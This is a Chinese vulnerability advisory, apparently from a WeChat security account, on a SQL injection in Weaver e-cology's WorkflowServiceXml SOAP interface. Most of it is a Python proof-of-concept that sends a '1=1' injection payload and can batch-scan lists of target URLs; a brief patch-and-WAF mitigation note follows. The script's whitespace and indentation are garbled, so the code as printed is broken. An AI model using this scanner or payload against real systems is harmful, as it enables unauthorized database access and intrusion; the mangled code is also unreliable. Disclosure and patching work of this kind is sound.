漏洞预警 | 泛微e-cology WorkflowServiceXml SQL注入

声明

该公众号分享的安全工具和项目均来源于网络,仅供学术交流,请勿直接用于任何商业场合和非法用途。如用于其它用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。

介绍

E-Cology OA协同商务系统是一款面向中大型组织的数字化办公产品,它基于全新的设计理念和管理思想,旨在为中大型组织创建一个全新的高效协同办公环境。其WorkflowServiceXml接口存在sql注入,恶意攻击者可能会向数据库发送构造的恶意SQL查询语句,以获取数据库敏感信息、修改数据或者执行其他恶意操作,还有可能直接通过sql注入获取服务器权限。

影响

泛微e-cology9 < 10.64.1

POC

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import argparse
from urllib3.exceptions importInsecureRequestWarning

RED ='\033[91m'
RESET ='\033[0m'
# 忽略证书验证警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

defcheck_sql_injection(url):
    headers ={
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36',
'Content-Type':'text/xml',
'Accept-Encoding':'gzip'
}

    data ='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver">
                <soapenv:Header/>
                <soapenv:Body>
                    <web:getHendledWorkflowRequestList>
                        <web:in0>1</web:in0>
                        <web:in1>1</web:in1>
                        <web:in2>1</web:in2>
                        <web:in3>1</web:in3>
                        <web:in4>
                            <web:string>1=1</web:string>
                        </web:in4>
                    </web:getHendledWorkflowRequestList>
                </soapenv:Body>
              </soapenv:Envelope>'''


try:
        response = requests.post(f"{url.rstrip('/')}/services/WorkflowServiceXml", headers=headers, data=data, verify=False, timeout=30)
if response.status_code ==200and"WorkflowRequestInfo"in response.text:
print(f"{RED}URL [{url}] 存在泛微e-cology WorkflowServiceXml SQL注入漏洞{RESET}")
else:
print(f"URL [{url}] 可能不存在漏洞")
except requests.RequestExceptionas e:
print(f"URL [{url}] 请求失败: {e}")

defmain():
    parser = argparse.ArgumentParser(description='检测目标地址是否存在泛微e-cology WorkflowServiceXml SQL注入漏洞')
    parser.add_argument('-u','--url',help='指定目标地址')
    parser.add_argument('-f','--file',help='指定包含目标地址的文本文件')

    args = parser.parse_args()

if args.url:
ifnot args.url.startswith("http://")andnot args.url.startswith("https://"):
            args.url ="http://"+ args.url
        check_sql_injection(args.url)
elif args.file:
withopen(args.file,'r')as file:
            urls = file.read().splitlines()
for url in urls:
ifnot url.startswith("http://")andnot url.startswith("https://"):
                    url ="http://"+ url
                check_sql_injection(url)

if __name__ =='__main__':
    main()

防范

  • • 官方已发布安全补丁,建议联系厂商打补丁或升级版本。

  • • 引入Web应用防火墙防护,配置接口拦截策略。


免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐